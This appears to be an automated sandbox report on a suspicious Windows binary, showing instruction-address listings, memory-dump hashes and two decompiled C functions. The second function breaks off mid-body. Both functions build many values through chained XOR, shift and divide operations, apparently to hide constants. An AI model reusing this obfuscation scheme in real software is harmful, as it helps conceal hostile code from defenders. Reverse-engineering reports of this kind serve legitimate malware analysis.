                                                                                                                                                                                                                    0x00a6e9b3
                                                                                                                                                                                                                    0x00a6e9bb
                                                                                                                                                                                                                    0x00a6e9c3
                                                                                                                                                                                                                    0x00a6e9cb
                                                                                                                                                                                                                    0x00a6e9d3
                                                                                                                                                                                                                    0x00a6e9d8
                                                                                                                                                                                                                    0x00a6e9e0
                                                                                                                                                                                                                    0x00a6e9e8
                                                                                                                                                                                                                    0x00a6e9f0
                                                                                                                                                                                                                    0x00a6e9f5
                                                                                                                                                                                                                    0x00a6e9fd
                                                                                                                                                                                                                    0x00a6ea05
                                                                                                                                                                                                                    0x00a6ea0d
                                                                                                                                                                                                                    0x00a6ea15
                                                                                                                                                                                                                    0x00a6ea21
                                                                                                                                                                                                                    0x00a6ea29
                                                                                                                                                                                                                    0x00a6ea2d
                                                                                                                                                                                                                    0x00a6ea35
                                                                                                                                                                                                                    0x00a6ea3d
                                                                                                                                                                                                                    0x00a6ea3d
                                                                                                                                                                                                                    0x00a6ea4b
                                                                                                                                                                                                                    0x00a6eb7e
                                                                                                                                                                                                                    0x00a6ea51
                                                                                                                                                                                                                    0x00a6ea57
                                                                                                                                                                                                                    0x00a6eaf1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ea5d
                                                                                                                                                                                                                    0x00a6ea63
                                                                                                                                                                                                                    0x00a6ead8
                                                                                                                                                                                                                    0x00a6eadd
                                                                                                                                                                                                                    0x00a6eae4
                                                                                                                                                                                                                    0x00a6eaea
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6eaea
                                                                                                                                                                                                                    0x00a6ea65
                                                                                                                                                                                                                    0x00a6ea6b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ea71
                                                                                                                                                                                                                    0x00a6eab0
                                                                                                                                                                                                                    0x00a6eab5
                                                                                                                                                                                                                    0x00a6eabc
                                                                                                                                                                                                                    0x00a6eac2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6eac2
                                                                                                                                                                                                                    0x00a6eabc
                                                                                                                                                                                                                    0x00a6ea6b
                                                                                                                                                                                                                    0x00a6ea63
                                                                                                                                                                                                                    0x00a6ea57
                                                                                                                                                                                                                    0x00a6eb98
                                                                                                                                                                                                                    0x00a6eba1
                                                                                                                                                                                                                    0x00a6eba1
                                                                                                                                                                                                                    0x00a6eb46
                                                                                                                                                                                                                    0x00a6eb4b
                                                                                                                                                                                                                    0x00a6eb52
                                                                                                                                                                                                                    0x00a6eb8e
                                                                                                                                                                                                                    0x00a6eb90
                                                                                                                                                                                                                    0x00a6eb95
                                                                                                                                                                                                                    0x00a6eb54
                                                                                                                                                                                                                    0x00a6eb54
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6eb54
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6eb59
                                                                                                                                                                                                                    0x00a6eb59
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #$gs$w!av$~$'yJ$lQ
                                                                                                                                                                                                                    • API String ID: 0-2114911508
                                                                                                                                                                                                                    • Opcode ID: b074608d6a2c01bc7c83798673dfb43bb9e7a697e397caea9c6f63fdf7909f03
                                                                                                                                                                                                                    • Instruction ID: d912c83e056371fe6264ef14bc24e8c45e1856077fbec8d00d3c9e1f75d9798a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b074608d6a2c01bc7c83798673dfb43bb9e7a697e397caea9c6f63fdf7909f03
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACC1FDB54093809FD7A8CF65C98A81BFBF1FBD4748F50890DF29696220D3B68949CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                    			E00A65D88(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				char _v572;
                                                                                                                                                                                                                    				void* _t120;
                                                                                                                                                                                                                    				void* _t136;
                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                    				signed int _t142;
                                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                                                    				signed int _t145;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t120);
                                                                                                                                                                                                                    				_v32 = 0x9cd0e4;
                                                                                                                                                                                                                    				_t141 = 0x5e;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x1b;
                                                                                                                                                                                                                    				_v32 = _v32 >> 0xc;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0000a29f;
                                                                                                                                                                                                                    				_v40 = 0x2a3b4b;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff552e;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x002a529b;
                                                                                                                                                                                                                    				_v52 = 0xe6222a;
                                                                                                                                                                                                                    				_t15 =  &_v52; // 0xe6222a
                                                                                                                                                                                                                    				_v52 =  *_t15 / _t141;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0003ba74;
                                                                                                                                                                                                                    				_v12 = 0x9f63a;
                                                                                                                                                                                                                    				_t142 = 0x7a;
                                                                                                                                                                                                                    				_v12 = _v12 / _t142;
                                                                                                                                                                                                                    				_t143 = 0x78;
                                                                                                                                                                                                                    				_v12 = _v12 / _t143;
                                                                                                                                                                                                                    				_t144 = 0x3e;
                                                                                                                                                                                                                    				_v12 = _v12 / _t144;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0008cc82;
                                                                                                                                                                                                                    				_v28 = 0x2b6d23;
                                                                                                                                                                                                                    				_v28 = _v28 >> 0x10;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xde79e793;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xde7be9f5;
                                                                                                                                                                                                                    				_v8 = 0x4997f1;
                                                                                                                                                                                                                    				_t145 = 0x36;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x6b;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xb7ffebff;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xbffd189d;
                                                                                                                                                                                                                    				_v20 = 0x7a2063;
                                                                                                                                                                                                                    				_t59 =  &_v20; // 0x7a2063
                                                                                                                                                                                                                    				_v20 =  *_t59 * 0x50;
                                                                                                                                                                                                                    				_v20 = _v20 >> 2;
                                                                                                                                                                                                                    				_v20 = _v20 / _t145;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0027c9fc;
                                                                                                                                                                                                                    				_v44 = 0x9484af;
                                                                                                                                                                                                                    				_v44 = _v44 >> 5;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000c11cb;
                                                                                                                                                                                                                    				_v24 = 0xc09610;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffff7e12;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x1620;
                                                                                                                                                                                                                    				_v24 = _v24 >> 2;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00300b84;
                                                                                                                                                                                                                    				_v16 = 0x935b2d;
                                                                                                                                                                                                                    				_v16 = _v16 + 0x7159;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffff45fa;
                                                                                                                                                                                                                    				_v16 = _v16 << 8;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x931f0fb4;
                                                                                                                                                                                                                    				_v48 = 0x53a2da;
                                                                                                                                                                                                                    				_v48 = _v48 >> 8;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x0006b04e;
                                                                                                                                                                                                                    				_v36 = 0x795a78;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xfe572a1d;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x2a;
                                                                                                                                                                                                                    				_t104 =  &_v36;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xb39b207b;
                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                    				_push(_v52);
                                                                                                                                                                                                                    				_push(_v40);
                                                                                                                                                                                                                    				_t136 = E00A81E60(0xa613e8, _v32,  *_t104);
                                                                                                                                                                                                                    				E00A7E97F( &_v572,  *_t104, _v28, _v8, 0xa613e8, _v20, __edx);
                                                                                                                                                                                                                    				E00A7D6DF(_v44, _t136, _v24, _v16);
                                                                                                                                                                                                                    				return E00A7A9FE(_v48,  &_v572, _v36);
                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                    0x00a65d93
                                                                                                                                                                                                                    0x00a65d98
                                                                                                                                                                                                                    0x00a65d99
                                                                                                                                                                                                                    0x00a65d9a
                                                                                                                                                                                                                    0x00a65d9f
                                                                                                                                                                                                                    0x00a65dae
                                                                                                                                                                                                                    0x00a65db1
                                                                                                                                                                                                                    0x00a65db4
                                                                                                                                                                                                                    0x00a65db8
                                                                                                                                                                                                                    0x00a65dbf
                                                                                                                                                                                                                    0x00a65dc6
                                                                                                                                                                                                                    0x00a65dcd
                                                                                                                                                                                                                    0x00a65dd4
                                                                                                                                                                                                                    0x00a65ddb
                                                                                                                                                                                                                    0x00a65de2
                                                                                                                                                                                                                    0x00a65de5
                                                                                                                                                                                                                    0x00a65dec
                                                                                                                                                                                                                    0x00a65df6
                                                                                                                                                                                                                    0x00a65dfb
                                                                                                                                                                                                                    0x00a65e03
                                                                                                                                                                                                                    0x00a65e08
                                                                                                                                                                                                                    0x00a65e10
                                                                                                                                                                                                                    0x00a65e15
                                                                                                                                                                                                                    0x00a65e1a
                                                                                                                                                                                                                    0x00a65e21
                                                                                                                                                                                                                    0x00a65e28
                                                                                                                                                                                                                    0x00a65e2c
                                                                                                                                                                                                                    0x00a65e33
                                                                                                                                                                                                                    0x00a65e3a
                                                                                                                                                                                                                    0x00a65e45
                                                                                                                                                                                                                    0x00a65e46
                                                                                                                                                                                                                    0x00a65e49
                                                                                                                                                                                                                    0x00a65e50
                                                                                                                                                                                                                    0x00a65e57
                                                                                                                                                                                                                    0x00a65e5e
                                                                                                                                                                                                                    0x00a65e62
                                                                                                                                                                                                                    0x00a65e65
                                                                                                                                                                                                                    0x00a65e6e
                                                                                                                                                                                                                    0x00a65e71
                                                                                                                                                                                                                    0x00a65e78
                                                                                                                                                                                                                    0x00a65e7f
                                                                                                                                                                                                                    0x00a65e83
                                                                                                                                                                                                                    0x00a65e8a
                                                                                                                                                                                                                    0x00a65e91
                                                                                                                                                                                                                    0x00a65e98
                                                                                                                                                                                                                    0x00a65e9f
                                                                                                                                                                                                                    0x00a65ea3
                                                                                                                                                                                                                    0x00a65eaa
                                                                                                                                                                                                                    0x00a65eb1
                                                                                                                                                                                                                    0x00a65eb8
                                                                                                                                                                                                                    0x00a65ebf
                                                                                                                                                                                                                    0x00a65ec3
                                                                                                                                                                                                                    0x00a65eca
                                                                                                                                                                                                                    0x00a65ed1
                                                                                                                                                                                                                    0x00a65ed5
                                                                                                                                                                                                                    0x00a65edc
                                                                                                                                                                                                                    0x00a65ee3
                                                                                                                                                                                                                    0x00a65ef3
                                                                                                                                                                                                                    0x00a65ef6
                                                                                                                                                                                                                    0x00a65ef6
                                                                                                                                                                                                                    0x00a65efd
                                                                                                                                                                                                                    0x00a65f00
                                                                                                                                                                                                                    0x00a65f03
                                                                                                                                                                                                                    0x00a65f09
                                                                                                                                                                                                                    0x00a65f26
                                                                                                                                                                                                                    0x00a65f36
                                                                                                                                                                                                                    0x00a65f54

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #m+$*"$K;*$Yq$c z$xZy
                                                                                                                                                                                                                    • API String ID: 0-2968633656
                                                                                                                                                                                                                    • Opcode ID: 27bbd84aabe77607f5688a0ca4937023c528c6c1aed80f092b09cf6000a14fc9
                                                                                                                                                                                                                    • Instruction ID: cf6c791829585eff7230a22e15abbd99c547e06246fc9735b245342af24e9b23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27bbd84aabe77607f5688a0ca4937023c528c6c1aed80f092b09cf6000a14fc9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E512271D0021DEBCF48DFA5D94A8EEFBB2FB84314F108159E114B6260D7B90A55CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                    			E00A7B587(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                                                                                    				char _v128;
                                                                                                                                                                                                                    				char _v256;
                                                                                                                                                                                                                    				char _v288;
                                                                                                                                                                                                                    				intOrPtr _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				unsigned int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                                                                    				signed int _v320;
                                                                                                                                                                                                                    				signed int _v324;
                                                                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                    				signed int _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                                                                    				signed int _v348;
                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                                                                    				signed int _v372;
                                                                                                                                                                                                                    				signed int _v376;
                                                                                                                                                                                                                    				signed int _v380;
                                                                                                                                                                                                                    				signed int _v384;
                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                    				unsigned int _v392;
                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                    				signed int _v412;
                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                    				signed int _v428;
                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                    				signed int _v440;
                                                                                                                                                                                                                    				signed int _v444;
                                                                                                                                                                                                                    				signed int _v448;
                                                                                                                                                                                                                    				signed int _v452;
                                                                                                                                                                                                                    				signed int _v456;
                                                                                                                                                                                                                    				signed int _v460;
                                                                                                                                                                                                                    				intOrPtr* _v464;
                                                                                                                                                                                                                    				signed int _v468;
                                                                                                                                                                                                                    				signed int _v472;
                                                                                                                                                                                                                    				signed int _v476;
                                                                                                                                                                                                                    				signed int _v480;
                                                                                                                                                                                                                    				signed int _v484;
                                                                                                                                                                                                                    				signed int _v488;
                                                                                                                                                                                                                    				signed int _v492;
                                                                                                                                                                                                                    				signed int _v496;
                                                                                                                                                                                                                    				unsigned int _v500;
                                                                                                                                                                                                                    				signed int _v504;
                                                                                                                                                                                                                    				signed int _v508;
                                                                                                                                                                                                                    				signed int _v512;
                                                                                                                                                                                                                    				unsigned int _v516;
                                                                                                                                                                                                                    				signed int _v520;
                                                                                                                                                                                                                    				signed int _v524;
                                                                                                                                                                                                                    				signed int _v528;
                                                                                                                                                                                                                    				unsigned int _v532;
                                                                                                                                                                                                                    				signed int _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				void* _t655;
                                                                                                                                                                                                                    				signed int _t662;
                                                                                                                                                                                                                    				int _t669;
                                                                                                                                                                                                                    				void* _t683;
                                                                                                                                                                                                                    				signed int _t685;
                                                                                                                                                                                                                    				signed int _t689;
                                                                                                                                                                                                                    				void* _t690;
                                                                                                                                                                                                                    				void* _t695;
                                                                                                                                                                                                                    				signed int _t706;
                                                                                                                                                                                                                    				intOrPtr* _t711;
                                                                                                                                                                                                                    				void* _t715;
                                                                                                                                                                                                                    				void* _t718;
                                                                                                                                                                                                                    				void* _t730;
                                                                                                                                                                                                                    				signed int _t733;
                                                                                                                                                                                                                    				void* _t766;
                                                                                                                                                                                                                    				signed int _t779;
                                                                                                                                                                                                                    				signed int _t780;
                                                                                                                                                                                                                    				signed int _t781;
                                                                                                                                                                                                                    				signed int _t782;
                                                                                                                                                                                                                    				signed int _t783;
                                                                                                                                                                                                                    				signed int _t784;
                                                                                                                                                                                                                    				signed int _t785;
                                                                                                                                                                                                                    				signed int _t786;
                                                                                                                                                                                                                    				signed int _t787;
                                                                                                                                                                                                                    				signed int _t788;
                                                                                                                                                                                                                    				signed int _t789;
                                                                                                                                                                                                                    				signed int _t790;
                                                                                                                                                                                                                    				signed int _t791;
                                                                                                                                                                                                                    				signed int _t792;
                                                                                                                                                                                                                    				signed int _t793;
                                                                                                                                                                                                                    				signed int _t794;
                                                                                                                                                                                                                    				void* _t795;
                                                                                                                                                                                                                    				void* _t798;
                                                                                                                                                                                                                    				void* _t800;
                                                                                                                                                                                                                    				signed int _t804;
                                                                                                                                                                                                                    				signed int* _t805;
                                                                                                                                                                                                                    				signed int* _t807;
                                                                                                                                                                                                                    				void* _t812;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t711 = __ecx;
                                                                                                                                                                                                                    				_t805 =  &_v556;
                                                                                                                                                                                                                    				_v368 = 0xdd63dd;
                                                                                                                                                                                                                    				_v368 = _v368 << 8;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x7c79edd3;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0xa11a30d3;
                                                                                                                                                                                                                    				_v552 = 0x7a30c0;
                                                                                                                                                                                                                    				_v552 = _v552 + 0xfffff06e;
                                                                                                                                                                                                                    				_v296 = __edx;
                                                                                                                                                                                                                    				_t798 = 0xf928600;
                                                                                                                                                                                                                    				_v464 = __ecx;
                                                                                                                                                                                                                    				_t780 = 0x45;
                                                                                                                                                                                                                    				_v552 = _v552 / _t780;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0x928f0a70;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0x92871287;
                                                                                                                                                                                                                    				_v460 = 0x489ec6;
                                                                                                                                                                                                                    				_v460 = _v460 | 0xba485c5f;
                                                                                                                                                                                                                    				_v460 = _v460 << 7;
                                                                                                                                                                                                                    				_v460 = _v460 ^ 0x246505c3;
                                                                                                                                                                                                                    				_v392 = 0x613517;
                                                                                                                                                                                                                    				_v392 = _v392 | 0xa12f86f8;
                                                                                                                                                                                                                    				_v392 = _v392 >> 0xd;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x00094e8a;
                                                                                                                                                                                                                    				_v408 = 0x1ca2ac;
                                                                                                                                                                                                                    				_v408 = _v408 + 0x3868;
                                                                                                                                                                                                                    				_t781 = 0x7d;
                                                                                                                                                                                                                    				_v408 = _v408 * 0x21;
                                                                                                                                                                                                                    				_v408 = _v408 ^ 0x03bb6fd7;
                                                                                                                                                                                                                    				_v544 = 0xfcaa63;
                                                                                                                                                                                                                    				_v544 = _v544 * 0x4a;
                                                                                                                                                                                                                    				_v544 = _v544 >> 0xb;
                                                                                                                                                                                                                    				_v544 = _v544 * 0x57;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0x0310e674;
                                                                                                                                                                                                                    				_v376 = 0x651277;
                                                                                                                                                                                                                    				_v376 = _v376 + 0xffffee83;
                                                                                                                                                                                                                    				_v376 = _v376 | 0xfa3da73d;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0xfa7ff387;
                                                                                                                                                                                                                    				_v468 = 0x6b1138;
                                                                                                                                                                                                                    				_v468 = _v468 + 0xffff0a43;
                                                                                                                                                                                                                    				_v468 = _v468 >> 0xb;
                                                                                                                                                                                                                    				_v468 = _v468 * 0x1e;
                                                                                                                                                                                                                    				_v468 = _v468 ^ 0x000c1084;
                                                                                                                                                                                                                    				_v360 = 0x95288d;
                                                                                                                                                                                                                    				_v360 = _v360 + 0xffff6744;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x009dc60b;
                                                                                                                                                                                                                    				_v532 = 0xe28fc5;
                                                                                                                                                                                                                    				_v532 = _v532 >> 4;
                                                                                                                                                                                                                    				_v532 = _v532 | 0xfaa8f597;
                                                                                                                                                                                                                    				_v532 = _v532 >> 0xe;
                                                                                                                                                                                                                    				_v532 = _v532 ^ 0x0009807e;
                                                                                                                                                                                                                    				_v348 = 0x96023b;
                                                                                                                                                                                                                    				_v348 = _v348 >> 5;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0x0003928c;
                                                                                                                                                                                                                    				_v316 = 0xc892da;
                                                                                                                                                                                                                    				_v316 = _v316 >> 9;
                                                                                                                                                                                                                    				_v316 = _v316 ^ 0x0000a18a;
                                                                                                                                                                                                                    				_v524 = 0xe5b79e;
                                                                                                                                                                                                                    				_v524 = _v524 * 0x22;
                                                                                                                                                                                                                    				_v524 = _v524 + 0xffff5c50;
                                                                                                                                                                                                                    				_v524 = _v524 / _t781;
                                                                                                                                                                                                                    				_v524 = _v524 ^ 0x0039c564;
                                                                                                                                                                                                                    				_v432 = 0x90cb69;
                                                                                                                                                                                                                    				_v432 = _v432 << 1;
                                                                                                                                                                                                                    				_v432 = _v432 * 0x37;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0x3e3dcf15;
                                                                                                                                                                                                                    				_v308 = 0xe2aed5;
                                                                                                                                                                                                                    				_v308 = _v308 >> 4;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x000dde6e;
                                                                                                                                                                                                                    				_v492 = 0x16e348;
                                                                                                                                                                                                                    				_v492 = _v492 ^ 0xa771b270;
                                                                                                                                                                                                                    				_v492 = _v492 | 0xead3cc28;
                                                                                                                                                                                                                    				_t782 = 0x72;
                                                                                                                                                                                                                    				_v492 = _v492 / _t782;
                                                                                                                                                                                                                    				_v492 = _v492 ^ 0x021764ee;
                                                                                                                                                                                                                    				_v476 = 0x7c5ea0;
                                                                                                                                                                                                                    				_t783 = 0x2d;
                                                                                                                                                                                                                    				_v476 = _v476 * 0x2a;
                                                                                                                                                                                                                    				_v476 = _v476 + 0xffff955c;
                                                                                                                                                                                                                    				_v476 = _v476 + 0x1b0a;
                                                                                                                                                                                                                    				_v476 = _v476 ^ 0x1465bf89;
                                                                                                                                                                                                                    				_v516 = 0x467f27;
                                                                                                                                                                                                                    				_v516 = _v516 + 0xffff2934;
                                                                                                                                                                                                                    				_v516 = _v516 >> 0xa;
                                                                                                                                                                                                                    				_v516 = _v516 >> 0xc;
                                                                                                                                                                                                                    				_v516 = _v516 ^ 0x000c8992;
                                                                                                                                                                                                                    				_v340 = 0xf3313c;
                                                                                                                                                                                                                    				_v340 = _v340 / _t783;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0x0005da8f;
                                                                                                                                                                                                                    				_v556 = 0xab208e;
                                                                                                                                                                                                                    				_v556 = _v556 * 0x31;
                                                                                                                                                                                                                    				_v556 = _v556 | 0xe8f895b4;
                                                                                                                                                                                                                    				_v556 = _v556 >> 6;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x03a64ba2;
                                                                                                                                                                                                                    				_v424 = 0x2737a4;
                                                                                                                                                                                                                    				_v424 = _v424 << 6;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x3a5d49ef;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x339039d5;
                                                                                                                                                                                                                    				_v320 = 0x879be7;
                                                                                                                                                                                                                    				_v320 = _v320 << 4;
                                                                                                                                                                                                                    				_v320 = _v320 ^ 0x08789900;
                                                                                                                                                                                                                    				_v444 = 0xd274d1;
                                                                                                                                                                                                                    				_v444 = _v444 * 0x15;
                                                                                                                                                                                                                    				_v444 = _v444 * 0x24;
                                                                                                                                                                                                                    				_v444 = _v444 ^ 0x6d884a26;
                                                                                                                                                                                                                    				_v500 = 0xbc5aea;
                                                                                                                                                                                                                    				_v500 = _v500 | 0xf6c19af3;
                                                                                                                                                                                                                    				_v500 = _v500 >> 7;
                                                                                                                                                                                                                    				_v500 = _v500 >> 6;
                                                                                                                                                                                                                    				_v500 = _v500 ^ 0x00073140;
                                                                                                                                                                                                                    				_v484 = 0x1259b0;
                                                                                                                                                                                                                    				_v484 = _v484 | 0xfdfabbf9;
                                                                                                                                                                                                                    				_v484 = _v484 + 0xffff8e03;
                                                                                                                                                                                                                    				_v484 = _v484 ^ 0xfdf61cc2;
                                                                                                                                                                                                                    				_v548 = 0xd2bc0;
                                                                                                                                                                                                                    				_v548 = _v548 | 0x3c20a99f;
                                                                                                                                                                                                                    				_v548 = _v548 >> 2;
                                                                                                                                                                                                                    				_v548 = _v548 + 0x2114;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x0f0e9459;
                                                                                                                                                                                                                    				_v416 = 0x9685bf;
                                                                                                                                                                                                                    				_v416 = _v416 | 0x369a0d6e;
                                                                                                                                                                                                                    				_v416 = _v416 >> 4;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0x03606d0e;
                                                                                                                                                                                                                    				_v508 = 0xa873e2;
                                                                                                                                                                                                                    				_v508 = _v508 ^ 0xe1dbaa57;
                                                                                                                                                                                                                    				_v508 = _v508 << 3;
                                                                                                                                                                                                                    				_v508 = _v508 * 0x1c;
                                                                                                                                                                                                                    				_v508 = _v508 ^ 0x455905d2;
                                                                                                                                                                                                                    				_v372 = 0x652b12;
                                                                                                                                                                                                                    				_v372 = _v372 >> 0xc;
                                                                                                                                                                                                                    				_v372 = _v372 * 0x53;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x0009676a;
                                                                                                                                                                                                                    				_v540 = 0x1e6ba6;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0xa840d467;
                                                                                                                                                                                                                    				_v540 = _v540 >> 0xd;
                                                                                                                                                                                                                    				_v540 = _v540 << 0xb;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0x2a1691b8;
                                                                                                                                                                                                                    				_v452 = 0xbd512c;
                                                                                                                                                                                                                    				_v452 = _v452 ^ 0xf4475f70;
                                                                                                                                                                                                                    				_v452 = _v452 | 0x04b836d9;
                                                                                                                                                                                                                    				_v452 = _v452 ^ 0xf4f3707e;
                                                                                                                                                                                                                    				_v400 = 0x72ad33;
                                                                                                                                                                                                                    				_t784 = 0x3f;
                                                                                                                                                                                                                    				_v400 = _v400 / _t784;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x62ada289;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x62a3ee06;
                                                                                                                                                                                                                    				_v364 = 0xedb8a6;
                                                                                                                                                                                                                    				_v364 = _v364 + 0xffffda96;
                                                                                                                                                                                                                    				_v364 = _v364 | 0x299d83d4;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x29ff1ab1;
                                                                                                                                                                                                                    				_v384 = 0xadb172;
                                                                                                                                                                                                                    				_t785 = 0x1a;
                                                                                                                                                                                                                    				_v384 = _v384 * 0x50;
                                                                                                                                                                                                                    				_v384 = _v384 | 0x7265ea11;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x766da4a1;
                                                                                                                                                                                                                    				_v324 = 0x91387b;
                                                                                                                                                                                                                    				_v324 = _v324 / _t785;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0x000938e8;
                                                                                                                                                                                                                    				_v312 = 0xd21c35;
                                                                                                                                                                                                                    				_v312 = _v312 + 0x33be;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x00d9e8ef;
                                                                                                                                                                                                                    				_v332 = 0x67340f;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0xef3dfc93;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0xef52cf68;
                                                                                                                                                                                                                    				_v536 = 0xc297cf;
                                                                                                                                                                                                                    				_v536 = _v536 | 0xd9c77bb3;
                                                                                                                                                                                                                    				_v536 = _v536 >> 8;
                                                                                                                                                                                                                    				_v536 = _v536 >> 5;
                                                                                                                                                                                                                    				_v536 = _v536 ^ 0x00052d56;
                                                                                                                                                                                                                    				_v420 = 0x462dfa;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x13e9399b;
                                                                                                                                                                                                                    				_t786 = 0x5a;
                                                                                                                                                                                                                    				_v420 = _v420 / _t786;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x003123af;
